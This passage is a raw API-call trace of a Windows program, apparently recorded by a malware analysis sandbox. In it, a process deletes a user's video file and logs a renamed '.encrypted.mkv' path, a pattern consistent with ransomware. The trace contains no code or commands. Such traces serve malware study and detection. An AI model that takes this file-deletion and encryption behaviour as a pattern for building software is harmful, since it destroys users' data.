lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.139] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.140] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.140] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.140] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.140] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.140] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.140] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.140] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.140] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.140] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.140] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.140] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.140] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.141] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.141] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.141] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.141] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.141] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv", lpFilePart=0x0) returned 0x43 [0042.141] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41b88250, ftCreationTime.dwHighDateTime=0x1d5b669, ftLastAccessTime.dwLowDateTime=0x39f1cbd0, ftLastAccessTime.dwHighDateTime=0x1d5b880, ftLastWriteTime.dwLowDateTime=0x18d26660, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1435f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="0bc6y2qC_04DdnddgHl.mkv", cAlternateFileName="0BC6Y2~1.MKV")) returned 0x7c2240 [0042.141] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\0bc6y2qc_04ddnddghl.mkv")) returned 1 [0042.143] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41b88250, ftCreationTime.dwHighDateTime=0x1d5b669, ftLastAccessTime.dwLowDateTime=0x39f1cbd0, ftLastAccessTime.dwHighDateTime=0x1d5b880, ftLastWriteTime.dwLowDateTime=0x18d26660, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1435f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="0bc6y2qC_04DdnddgHl.mkv", cAlternateFileName="0BC6Y2~1.MKV")) returned 0 [0042.143] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.144] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.144] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.144] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.144] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.144] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.144] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.144] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.145] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3370, lpOverlapped=0x0) returned 1 [0042.145] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.145] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x3370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.145] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.encrypted.mkv\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0042.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0042.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.encrypted.mkv\r\n", cchWideChar=80, lpMultiByteStr=0x7f36e0, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 80 [0042.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0042.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0042.145] WriteFile (in: hFile=0x128, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x4f, lpOverlapped=0x0) returned 1 [0042.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.145] CloseHandle (hObject=0x128) returned 1 [0042.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.150] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.150] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.151] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.151] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.151] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.152] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbf8 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.152] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.155] 